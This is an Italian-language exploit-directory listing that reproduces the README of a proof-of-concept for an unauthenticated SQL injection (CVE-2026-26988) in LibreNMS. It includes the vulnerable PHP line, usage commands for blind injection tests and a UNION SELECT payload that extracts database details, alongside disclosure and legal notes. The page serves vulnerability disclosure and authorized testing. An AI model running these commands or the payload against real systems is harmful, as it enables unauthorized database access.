Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-26988-LibreNMS-SQLi — Proof-of-concept exploit per SQL injection non autenticata in LibreNMS ajax_table.php, che dimostra tecniche di blind injection basate sul tempo e su condizioni booleane per test di sicurezza autorizzati. | Kitploit
Strumenti/GitHubGitHub/mbanyamer/cve-2026-26988-librenms-sqli
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e Formazione
GitHubmbanyamer/cve-2026-26988-librenms-sqli

CVE-2026-26988-LibreNMS-SQLi

Proof-of-concept exploit per SQL injection non autenticata in LibreNMS ajax_table.php, che dimostra tecniche di blind injection basate sul tempo e su condizioni booleane per test di sicurezza autorizzati.

Vedi Repository
147 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Author Role Country Platform Vulnerability CVE CVSS Status

CVE-2026-26988 – PoC di SQL Injection non autenticata in LibreNMS

SQL Injection non autenticata in ajax_table.php di LibreNMS tramite il parametro di ricerca dell'indirizzo IPv6.

  • Versioni interessate: LibreNMS ≤ 25.12.0
  • Corretta in: LibreNMS ≥ 26.1 (commit 15429580baba03ed1dd377bada1bde4b7a1175a1)
  • CVSS v4.0: 9.3 Critico
    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N
  • CWE: CWE-89 (Neutralizzazione impropria di elementi speciali utilizzati in un comando SQL – SQL Injection)

Riepilogo della vulnerabilità

Il parametro address quando search_type=ipv6 viene suddiviso su / in indirizzo e prefisso.
Il prefisso viene concatenato direttamente in una query SQL senza escaping:

$sql .= " AND ipv6_prefixlen = '$prefix'";

Un apice singolo (') nella parte del prefisso consente di uscire dalla stringa letterale → SQL injection arbitraria.

Diagramma del flusso dell'attacco

flowchart TD
    A[Attacker] -->|1. HTTP POST to /ajax_table.php| B[LibreNMS Web Server]
    B -->|2. id=address-search & search_type=ipv6| C[Parse address parameter]
    C -->|3. Split on '/' → $address / $prefix| D[Build vulnerable SQL]
    D -->|4. Concatenate: ipv6_prefixlen = '$prefix'| E[MySQL / MariaDB]
    E -->|5. Execute injected query| F[Return results / error / delay]
    F -->|6. Attacker observes response / timing| A

    subgraph "Injection Point"
        D
    end

    style D fill:#ff4d4d,stroke:#333,stroke-width:2px,color:#fff

Utilizzo del Proof-of-Concept

Requisiti

  • Python 3.x
  • Libreria requests (pip install requests)

Test di base (Errore di sintassi / 500)

python3 exploit.py http://target/librenms --test

Conferma blind basata sul tempo (consigliata)

python3 exploit.py http://192.168.1.50/librenms --time

→ Se la risposta richiede >5–6 secondi → vulnerabile

Test blind basato su booleani

python3 exploit.py http://target/librenms --boolean

Esempio di payload personalizzato

python3 exploit.py http://target/librenms --test --payload "64' UNION SELECT database(),user(),version() -- "

File in questo repository

  • exploit.py .............. Script PoC principale (rinominare da cve-2026-26988-poc.py se necessario)
  • README.md ............... Questo file

Divulgazione responsabile

  • Segnalato: febbraio 2026 (tramite GitHub Security Advisory)
  • Corretto nel: commit 15429580baba... → PR #18777
  • Advisory: https://github.com/librenms/librenms/security/advisories/GHSA-h3rv-q4rq-pqcv

Avviso legale ed etico

Questo proof-of-concept è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati.

NON utilizzare questo codice contro qualsiasi sistema o rete senza un'esplicita autorizzazione scritta del proprietario.
L'uso non autorizzato può violare leggi, incluse (ma non solo) il Computer Fraud and Abuse Act (CFAA) negli Stati Uniti o la legislazione equivalente nel tuo paese.

Usalo a tuo rischio.


Autore: Mohammed Idrees Banyamer
Instagram: @banyamer_security
Data: 20 febbraio 2026

Scarica lo strumento